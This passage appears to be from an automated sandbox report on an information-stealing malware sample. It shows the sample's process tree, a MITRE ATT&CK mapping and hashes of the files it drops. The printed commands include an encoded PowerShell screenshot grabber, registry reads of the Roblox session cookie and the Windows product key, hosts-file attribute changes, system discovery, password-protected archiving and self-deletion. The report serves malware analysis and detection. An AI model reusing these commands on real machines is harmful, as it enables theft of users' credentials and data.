ACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2708
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ytmmjnei\ytmmjnei.cmdline"
        5⤵
        
        PID:4444
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES611B.tmp" "c:\Users\Admin\AppData\Local\Temp\ytmmjnei\CSC71CE13021577411EB1E98641FC1ADDDB.TMP"
        6⤵
        
        PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1200
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:228
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3476
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:984
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4764
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1516
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4820
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4252
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1916
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2688
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1468
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1888
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\cjNaG.zip" *"
    3⤵
    PID:3624
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\cjNaG.zip" *
      4⤵
      Executes dropped EXE
      PID:3184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\kovaks.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2096
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
712918301faec326d5676220b8791bbc

SHA1
08ee40d9b230a0772e2731001efb020c3aa9d5a1

SHA256
7eebe5c0225b95b0be4a9cb508dfca395f7f74ffc0e45cafed57672433aea554

SHA512
0f6cc78c465a47be0438d008247e99984248268decdb3d776b32e61edb718cff2a6439ffff708e0f53875b7b573d7b3f160a4a50d3814c84a28ea71ac5b66527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6e7796c77e77ee248ff74815ea95b07

SHA1
2c5bf47c6a74e977b83bd505c89db103418a1bf5

SHA256
f58b8c986827fbf0dfe0665e92897777bba0192b6926097ab62fa22114e00984

SHA512
1326565b2c52b1e4f56c614be87fb33f74216d21c0466f36b343b7dbde71f0daf20a29deacfd1c66bc1cc8e23e027c838922caadbd202a772019c9037e739305

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e8928bfc3fbc23204c63391542bbf20e

SHA1
c51049a3b9df7a0d389b1352adbe778db38444b3

SHA256
dfee18c14592f4e096a0939f02777b2b1852804448aacc6c0295075e19ba05f4

SHA512
83836bcb784187fa32c75b35bcae911459eb334dff4f6f37d01fd5abc4ef5d9cc216135e0acc4a6b2529121202982d078a730aac521ee608bddb192e47cde3cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES611B.tmp

Filesize
1KB

MD5
15b7e4ea298637cf5c5355e9d3db72b4

SHA1
6db710fedd3eecaf5bcac61b44d807dc4adf9bf1

SHA256
111ef479ca8a4fed603aaf034cb31c89deeb9b39a4754a1393418c367c85cbb2

SHA512
208b83f727f8345ae14244141b8bcb10d5e738e213a1ad69183bda83b86ba45eb945740c819bf2466e7eb4cc2690fa8dee076d7529a283e806a3680da941795b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_bz2.pyd

Filesize
48KB

MD5
3bd0dd2ed98fca486ec23c42a12978a8

SHA1
63df559f4f1a96eb84028dc06eaeb0ef43551acd

SHA256
6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07

SHA512
9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_ctypes.pyd

Filesize
58KB

MD5
343e1a85da03e0f80137719d48babc0f

SHA1
0702ba134b21881737585f40a5ddc9be788bab52

SHA256
7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664

SHA512
1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_decimal.pyd

Filesize
107KB

MD5
8b623d42698bf8a7602243b4be1f775d

SHA1
f9116f4786b5687a03c75d960150726843e1bc25

SHA256
7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c

SHA512
aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_hashlib.pyd

Filesize
35KB

MD5
d71df4f6e94bea5e57c267395ad2a172

SHA1
5c82bca6f2ce00c80e6fe885a651b404052ac7d0

SHA256
8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2

SHA512
e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_lzma.pyd

Filesize
86KB

MD5
932147ac29c593eb9e5244b67cf389bb

SHA1
3584ff40ab9aac1e557a6a6009d10f6835052cde

SHA256
bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3

SHA512
6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_queue.pyd

Filesize
25KB

MD5
0e5997263833ce8ce8a6a0ec35982a37

SHA1
96372353f71aaa56b32030bb5f5dd5c29b854d50

SHA256
0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e

SHA512
a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_socket.pyd

Filesize
43KB

MD5
2957b2d82521ed0198851d12ed567746

SHA1
ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2

SHA256
1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2

SHA512
b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_sqlite3.pyd

Filesize
56KB

MD5
a9d2c3cf00431d2b8c8432e8fb1feefd

SHA1
1c3e2fe22e10e1e9c320c1e6f567850fd22c710c

SHA256
aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3

SHA512
1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\_ssl.pyd

Filesize
65KB

MD5
e5f6bff7a8c2cd5cb89f40376dad6797

SHA1
b854fd43b46a4e3390d5f9610004010e273d7f5f

SHA256
0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5

SHA512
5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\base_library.zip

Filesize
1.4MB

MD5
79815aa8d38384cffbe26f17163070f4

SHA1
70fc65a18c11fd080e2f015fdbc92eab94986445

SHA256
797fdc984846499dea44bed35f0441cbf361ace7ea4ec5fe353b0bc48481dda7

SHA512
e9458c36f34646faf5a1b7fc87857ad114d77e6b2e576e14bf13fb30495509495fb4ddc90b63af444d87499a32eab229eb472d0a0439fb7305fa0637eb5ed376

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\blank.aes

Filesize
123KB

MD5
fe0b8a80c2392e39461d3002b39550c0

SHA1
fb26efca81fd7d285e6e84ad44357ab7a4db46f8

SHA256
b59b9d46eecf39aae770588938e784dfe622c8110e63d73df2144f987893ee97

SHA512
0e76920d9dc18a33f8c20129b9df70da124e004d1c12d4ed80a9244f5310ac8ff02a6927aca472bd86dfb41ec1681d87531540ae6379b464f437843d06ecd4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35082\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
